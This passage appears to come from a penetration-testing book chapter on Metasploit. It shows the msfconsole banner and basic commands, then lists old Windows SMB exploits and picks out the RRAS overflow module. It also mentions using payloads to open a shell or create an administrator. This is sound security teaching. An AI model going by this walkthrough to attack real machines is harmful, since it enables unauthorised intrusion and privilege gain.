Metasploit can pair any Windows exploit with any Windows payload. So we can
choose to use the RRAS vulnerability to open a command shell, create an administrator,
start a remote VNC session, or to do a bunch of other stuff. Let??™s get started.
$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >
Chapter 4: Using Metasploit
77
PART II
The interesting commands to start with are
show
info
use
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:
msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow
??¦
There it is! Metasploit calls it windows/smb/ms06_025_rras.
Pages:
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209